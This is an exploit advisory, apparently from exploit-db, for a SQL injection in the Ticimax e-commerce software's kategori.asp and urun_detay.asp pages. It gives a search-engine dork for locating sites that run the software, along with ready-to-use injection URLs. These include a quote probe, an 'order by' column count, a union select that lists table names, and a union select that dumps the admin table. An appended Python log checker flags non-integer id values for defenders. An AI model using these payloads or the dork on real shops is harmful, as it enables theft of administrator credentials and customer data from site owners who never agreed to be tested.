Ticimax E-Ticaret – SQL Injection

  • Author: Neuromancer
    Date: 2010-06-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12841/
  • # Exploit Title: [Ticimax E-Ticaret ( SQL Injection ) ]
    # Date: [01.06.2010]
    # Author: [Neuromancer]
    # Version: [app version]
    # CVE : [if exists]
    # Code : [exploit code] 
    
    
    #####################
    # Author: [Neuromancer]
    # contact : msn[at]neurom4ncer[dot]com
    # From : TURKEY
    #####################
    
    
    Ticimax e-ticaret ( Kategori.asp, urun_detay.asp ) Local SQL Injection Vulnerability
    
    Dork : "Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır"
    
    
    ======================================================================
    
     --=[ Vuln C0de ]=-
     
     [-] localhost/kategori.asp?id='
     [-] localhost/urun_detay.asp?id='
    
    http://[Site].com/kategori.asp?id=1 order by 1
    http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables
    
    or
    
    http://[Site].com/kategori.asp?id=1 union select * from admin
    
    =========================| -=[ Attackerz Crew co. ]=- |=========================
    
    Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR
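
For defenders, an added example (not part of the original advisory and not Ticimax code): an allow-list check that the `id` parameter of the two pages named above is a plain integer, applied to access-log lines to flag requests like the ones listed. The log format (`<client-ip> <method> <uri>`), the sample lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Pages and parameter named in the advisory; IIS treats paths case-insensitively.
WATCHED_PAGES = {"/kategori.asp", "/urun_detay.asp"}
PARAM = "id"
# ASCII digits only ([0-9], not \d, which also matches non-ASCII digits).
STRICT_INT = re.compile(r"[0-9]{1,10}")

# Constructed sample log lines (documentation IP ranges, simplified format).
SAMPLE_LOG = [
    "203.0.113.5 GET /kategori.asp?id=12",
    "203.0.113.9 GET /Kategori.asp?id=%27",
    "203.0.113.9 GET /urun_detay.asp?ID=1+order+by+1",
    "198.51.100.7 GET /default.asp?id=%27",
]

def id_is_valid(value):
    """Allow-list check: the id must be a short run of ASCII digits."""
    return STRICT_INT.fullmatch(value) is not None

def suspicious_requests(lines):
    """Return (line_no, client_ip, decoded_id) for watched pages with a non-integer id."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # not in the assumed '<ip> <method> <uri>' shape
        client_ip, _method, uri = parts
        url = urlsplit(uri.strip())
        if url.path.lower() not in WATCHED_PAGES:
            continue
        # parse_qsl decodes %xx and '+'; keep_blank_values so an empty 'id=' is still checked.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == PARAM and not id_is_valid(value):
                hits.append((line_no, client_ip, value))
    return hits

if __name__ == "__main__":
    for line_no, client_ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {client_ip} sent non-integer id {value!r}")
```

The same `id_is_valid` rule belongs in the application itself, before the value reaches any query, alongside parameterized queries; the log check only shows who has been probing.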